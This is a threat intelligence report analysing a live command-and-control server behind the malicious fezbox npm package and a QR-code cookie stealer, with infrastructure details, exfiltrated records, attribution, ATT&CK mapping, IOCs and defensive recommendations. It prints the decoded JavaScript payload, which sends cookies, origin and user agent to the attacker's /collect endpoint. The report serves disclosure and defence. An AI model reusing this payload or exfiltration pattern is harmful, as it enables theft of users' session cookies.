FEZBOX Supply Chain Attack C2 Panel

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime / Supply Chain Attack Source: @Fact_Finder03 Twitter lead (auto-triaged) Status: INFRASTRUCTURE LIVE

Executive Summary

A live Node.js supply chain attack command-and-control infrastructure was discovered at 1[.]94[.]210[.]59, hosted on Huawei Cloud (ECS) in Beijing, China. The server operates a dual-purpose C2 panel: (1) a malicious npm package exfiltration receiver that collected detailed system reconnaissance data from victims who installed the now-removed fezbox npm package (versions 1.0.0-1.3.0, published Aug 21-25, 2025), and (2) a QR code-based browser cookie stealer that exfiltrates cookies, origin, and user-agent data via an embedded JavaScript payload. The /collect endpoint remains live and accepting data as of April 3, 2026. Four exfiltration records were found, including detailed system fingerprints from a Chinese developer workstation (hostname: hstx, user: asus, Intel i7-13700H, Windows 11).

Key Findings

• LIVE C2 panel at 1[.]94[.]210[.]59 with three services: port 80 (nginx reverse proxy), port 8080 (Express.js exfil receiver + monitor panel), port 9090 ("DARKNET C2 CONTROL PANEL" dashboard)
• Malicious npm package fezbox (versions 1.0.0 through 1.3.0) was a real supply chain attack that npm security seized and replaced with a security holding package on September 22, 2025
• QR code payload encodes Base64 JavaScript that steals browser cookies and sends them to hxxp://1[.]94[.]210[.]59:8080/collect
• 4 exfiltrated victim records found in the open /data endpoint, including full system reconnaissance (hostname, OS, CPU, RAM, network interfaces, Node.js version, CWD, environment variables)
• Victim machine: Windows 11 (10.0.26100), hostname hstx, user asus, 13th Gen Intel i7-13700H, 16GB RAM, working directory D:\pycharmObject\fezbox-attack-test -- indicates the operator was self-testing the malware
• Chinese network interfaces with Simplified Chinese names (ben di lian jie / local connection) confirm Chinese-locale victim/operator
• All API endpoints are unauthenticated -- /data, /health, /collect are publicly accessible with no authentication
• Infrastructure is on Huawei Cloud (ECS), IP block owned by Beijing Teletron Telecom Engineering Co., Ltd. (DXTNET)

What Was Found vs. What Was Known

Aspect	Prior Reporting	Our Findings
Infrastructure	Unknown (Twitter tip only)	3 services on 3 ports, dual-purpose C2
npm package	fezbox seized by npm Sep 2025	Full exfiltrated data from the attack recovered
Victims	Unknown	4 records, 1 unique victim machine (likely operator self-test)
Attribution	Unknown	Chinese developer on Huawei Cloud, OPSEC failures identified
QR payload	Unknown	Base64 JavaScript cookie stealer decoded
Data exposure	Unknown	Entire exfiltration database publicly accessible

Attack Chain

[1] DELIVERY                [2] EXECUTION              [3] COLLECTION            [4] EXFILTRATION
     |                           |                          |                         |
  npm install fezbox        postinstall hook           System recon:             POST to C2:
  -- OR --                  executes malicious         - hostname                hxxp://1[.]94[.]210[.]59:
  Scan QR code              Node.js code               - OS/arch                 8080/collect
  (browser payload)         -- OR --                   - CPU/RAM
                            QR JS IIFE runs            - network IFs             Stored in:
                            in victim browser          - env vars                /opt/malicious/
                                                       - cookies (QR)            exfiltrated_data.log

Infrastructure Analysis

Network Infrastructure

IP	Hostname	ASN	Provider	Ports	Services	Status
1[.]94[.]210[.]59	ecs-1-94-210-59.compute.hwclouds-dns.com	DXTNET (Beijing Teletron)	Huawei Cloud ECS	22, 80, 8080, 9090	SSH, nginx 1.18.0, Express.js (x2)	LIVE

Service Inventory

Port	Service	Version	Purpose	Auth Required
22	OpenSSH	8.4p1 Debian 5+deb11u5	Administration	Yes (SSH keys)
80	nginx	1.18.0	Reverse proxy to port 8080	No
8080	Node.js Express	Unknown	C2 Monitor Panel + /collect exfil endpoint + /data viewer	NO
9090	Node.js Express	v2.0	"DARKNET C2 CONTROL PANEL" dashboard UI	NO

Known Vulnerabilities (from Shodan)

CVE	Description	Severity
CVE-2023-44487	HTTP/2 Rapid Reset (DDoS)	HIGH
CVE-2021-23017	nginx DNS resolver vulnerability	HIGH
CVE-2021-3618	ALPACA cross-protocol attack	MEDIUM
CVE-2025-23419	nginx TLS session ticket vulnerability	MEDIUM

Adjacent Infrastructure

IP	Findings
1[.]94[.]210[.]57	No information
1[.]94[.]210[.]58	No information
1[.]94[.]210[.]60	Port 3389 (RDP), hostname: ptrtest123name.com, self-signed cert
1[.]94[.]210[.]61	No information

Malware Analysis

Vector 1: Malicious npm Package (fezbox)

Package Name: fezbox Registry: npmjs.com Status: SEIZED by npm security (replaced with 0.0.1-security holding package)

Version	Published	Status
1.0.0	2025-08-21 12:54 UTC	Removed
1.0.1	2025-08-21 13:09 UTC	Removed
1.1.0	2025-08-21 13:21 UTC	Removed
1.1.1	2025-08-21 13:39 UTC	Removed
1.2.0	2025-08-22 06:18 UTC	Removed
1.3.0	2025-08-25 08:10 UTC	Removed
0.0.1-security	2025-09-22 23:26 UTC	npm security holder

Behavior (reconstructed from exfiltrated data):

• Executes on npm install (postinstall hook)
• Collects comprehensive system fingerprint:
  • Process info: platform, arch, Node.js version, PID, CWD, execPath
  • System info: hostname, OS type/release, uptime, load averages
  • Memory: total/free/used RAM
  • CPU: model, core count, architecture
  • Network: all interface names, primary IP
  • Environment: USER, HOME variables
• Labels payload as type: "nodejs_supply_chain_attack", phase: "exfiltration"
• Sends JSON POST to hxxp://1[.]94[.]210[.]59:8080/collect

Vector 2: QR Code Cookie Stealer

File: malicious_qr.jpg (actually PNG, 400x400) SHA256: a4cd83a3e43ac218257089d08afcdd7dfc95c73979f459fbfeec9a55da62d304

The QR code encodes a Base64 JavaScript payload:

(function(){
    console.log('[FEZBOX] Malicious payload activated');
    setTimeout(() => {
        const data = {
            cookies: document.cookie,
            origin: window.location.origin,
            userAgent: navigator.userAgent,
            timestamp: new Date().toISOString()
        };
        // Send to C2 server
        fetch('hxxp://1[.]94[.]210[.]59:8080/collect', {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify(data)
        });
    }, 3000);
})();

Behavior:

• Self-executing IIFE with 3-second delay (evasion)
• Collects: document.cookie, window.location.origin, navigator.userAgent
• Exfiltrates to the same /collect endpoint as the npm package

Second QR Code (hacker_qr.jpg)

File: hacker_qr.jpg (actually PNG, 300x300) SHA256: 0c91e5c71a659c6931f201267980918d2a2c39842a1850b5c9c2ad3589b226ee Status: Could not decode (may be decorative or corrupted)

C2 API Endpoints

Endpoint	Method	Auth	Function
/ (port 8080)	GET	None	Monitor panel HTML with attack log
/data	GET	None	Full exfiltrated data dump (JSON)
/health	GET	None	Server status, storage info, log file path
/collect	POST	None	LIVE exfiltration receiver -- accepts any JSON
/malicious_qr.jpg	GET	None	QR code with cookie stealer payload
/ (port 9090)	GET	None	"DARKNET C2 CONTROL PANEL" dashboard
/api/stats	GET	None	Connection count
/health (port 9090)	GET	None	Version info (v2.0), system name
/hacker_qr.jpg	GET	None	Second QR code image

Exfiltrated Data Analysis

4 records recovered from /data endpoint:

ID	Timestamp	Source IP	Data Type	Key Details
1759567343685	2025-10-04 08:42 UTC	183[.]210[.]123[.]88	nodejs_supply_chain_attack	hostname=hstx, user=asus, Win11, i7-13700H, fezbox-attack-test
1759758023535	2025-10-06 13:40 UTC	183[.]210[.]123[.]88	nodejs_supply_chain_attack	Same machine, different PID (2180), re-test
1759761463144	2025-10-06 14:37 UTC	183[.]210[.]123[.]88	Empty payload	Minimal/failed exfiltration
1775115479198	2026-04-02 07:37 UTC	216[.]203[.]20[.]196	test	Breakglass probe (our scan)

Victim/Operator Machine Profile:

• Hostname: hstx
• OS: Windows 11 (10.0.26100)
• CPU: 13th Gen Intel Core i7-13700H (20 cores)
• RAM: 15.6 GB total
• User: asus (HOME: C:\Users\asus)
• Node.js: v20.18.0
• CWD: D:\pycharmObject\fezbox-attack-test
• Network: VMware adapters present (VMnet1, VMnet8), WLAN, Chinese-locale interfaces
• Source IP: 183[.]210[.]123[.]88 (China Mobile Communications Corporation)

Assessment: The CWD (fezbox-attack-test) and test metadata ("test":{"name":"fezbox-supply-chain-test","stage":"complete","maliciousPackage":true}) strongly indicate this is the operator self-testing their own malware, not a genuine victim. The ASUS laptop with PyCharm is likely the developer's own workstation.

Threat Actor Profile

Attribution Assessment

• Confidence: MEDIUM
• Country/Region: China (HIGH confidence)
• Evidence:
  1. Server hosted on Huawei Cloud (ECS) -- Chinese cloud provider
  2. IP block owned by Beijing Teletron Telecom Engineering (DXTNET)
  3. Operator IP 183[.]210[.]123[.]88 belongs to China Mobile Communications Corporation
  4. Chinese-locale network interface names
  5. Developer uses PyCharm (CWD: D:\pycharmObject)
  6. Testing conducted from Chinese ISP
• Motivation: Likely educational/research demonstration (panel prominently labeled "Educational Use Only") -- but the npm package was real and the exfiltration endpoint is live
• Sophistication: LOW-MEDIUM
  • Dual-vector approach (npm + QR) shows some creativity
  • Complete absence of authentication on all endpoints shows poor OPSEC
  • Self-testing from same network as C2 shows operational immaturity
  • Panel has "Educational Use" disclaimers but functional malware

OPSEC Failures

1. No authentication on any endpoint -- entire exfiltration database publicly accessible
2. Self-testing from personal workstation -- exposed hostname, username, hardware details, ISP
3. Hardcoded C2 IP in QR payload -- no domain fronting, no proxy, no rotation
4. Chinese-locale artifacts -- network interface names in Simplified Chinese
5. Developer environment exposed -- PyCharm project directory visible in CWD
6. Log file path disclosed -- /opt/malicious/exfiltrated_data.log visible in health endpoint
7. CORS wildcard -- Access-Control-Allow-Origin: * on all endpoints

Actor Timeline

Date	Event
2025-08-21	fezbox npm package v1.0.0 through v1.1.1 published (4 versions in 45 minutes)
2025-08-22	fezbox v1.2.0 published
2025-08-25	fezbox v1.3.0 published (final malicious version)
2025-09-22	npm security seizes package, replaces with 0.0.1-security
2025-10-04	Operator self-tests supply chain attack from Chinese IP
2025-10-06	Second round of self-testing (2 attempts)
2026-04-03	Infrastructure still live and accepting data (this investigation)

Victim Analysis

Assessment

No confirmed external victims were identified. The 3 legitimate exfiltration records (excluding our probe) all originate from the same IP (183[.]210[.]123[.]88) and the same machine, with the CWD explicitly named fezbox-attack-test. This is the operator testing their own tool.

However, the malicious npm package was live on npmjs.com for 32 days (Aug 21 - Sep 22, 2025). Any developer who ran npm install fezbox during this window would have had their system fingerprinted and exfiltrated. The server may have been wiped/reset since then, or the 4 records represent the total exfiltration count.

Potential Impact (if package was installed by real victims)

• Full system reconnaissance exfiltrated (hostname, OS, CPU, RAM, network topology)
• Working directory paths exposed (may reveal project names, corporate paths)
• Environment variables exposed (USER, HOME -- could contain tokens if misconfigured)
• Network interface enumeration (reveals VPN, corporate network adapters)

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Supply Chain Compromise: Compromise Software Dependencies	T1195.001	Malicious fezbox npm package
Execution	Command and Scripting Interpreter: JavaScript	T1059.007	QR code JavaScript payload
Discovery	System Information Discovery	T1082	Hostname, OS, CPU, RAM enumeration
Discovery	System Network Configuration Discovery	T1016	Network interface enumeration
Discovery	Process Discovery	T1057	PID, CWD, execPath collection
Discovery	System Owner/User Discovery	T1033	USER, HOME environment variables
Collection	Data from Local System	T1005	Cookie theft via QR payload
Exfiltration	Exfiltration Over C2 Channel	T1041	HTTP POST to /collect endpoint
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	HTTP-based C2 communication

IOC Summary

Network Indicators

Type	Value	Context
IP	1[.]94[.]210[.]59	C2 server (Huawei Cloud ECS)
IP	183[.]210[.]123[.]88	Operator/test IP (China Mobile)
URL	hxxp://1[.]94[.]210[.]59:8080/collect	Exfiltration endpoint
URL	hxxp://1[.]94[.]210[.]59:8080/data	Data viewer (unauthenticated)
URL	hxxp://1[.]94[.]210[.]59:9090/	C2 dashboard
Hostname	ecs-1-94-210-59.compute.hwclouds-dns.com	Reverse DNS

File Indicators

Hash	Type	File
a4cd83a3e43ac218257089d08afcdd7dfc95c73979f459fbfeec9a55da62d304	SHA256	malicious_qr.jpg (cookie stealer QR)
0c91e5c71a659c6931f201267980918d2a2c39842a1850b5c9c2ad3589b226ee	SHA256	hacker_qr.jpg (secondary QR)
d2f23c88f3be3bb596d8b76bd013a0c349ab180c	SHA1	fezbox@0.0.1-security (npm holding pkg)

Behavioral Indicators

Type	Value	Context
npm package	fezbox (versions 1.0.0-1.3.0)	Malicious supply chain package (SEIZED)
Console log	[FEZBOX] Malicious payload activated	QR payload activation marker
File path	/opt/malicious/exfiltrated_data.log	Server-side exfil storage
JSON field	nodejs_supply_chain_attack	Exfiltration type identifier

Recommended Actions

Immediate (24-48 hours)

1. Block C2 IP 1[.]94[.]210[.]59 at network perimeter (all ports)
2. Audit npm dependencies for any historical installation of fezbox package
3. Search SIEM for outbound connections to 1[.]94[.]210[.]59:8080
4. Check npm audit logs for fezbox in any CI/CD pipeline

Short-term (1-2 weeks)

1. Report to Huawei Cloud abuse -- server hosting live C2 infrastructure
2. Submit IOCs to ThreatFox for community blocking
3. Deploy Suricata rules for fezbox exfiltration pattern detection
4. Scan QR codes in any recent phishing campaigns for Base64 JS payloads

Medium-term (1-3 months)

1. Monitor npm registry for typosquat variants (fez-box, fezBox, fezb0x, etc.)
2. Implement npm package allowlisting in CI/CD pipelines
3. Deploy YARA rules for fezbox payload detection

References

• npm security holding package: https://www.npmjs.com/package/fezbox
• Shodan InternetDB: https://internetdb.shodan.io/1.94.210.59
• Source lead: @Fact_Finder03 Twitter
• MITRE ATT&CK T1195.001: https://attack.mitre.org/techniques/T1195/001/

---

GHOST -- Breakglass Intelligence "One indicator. Total infrastructure."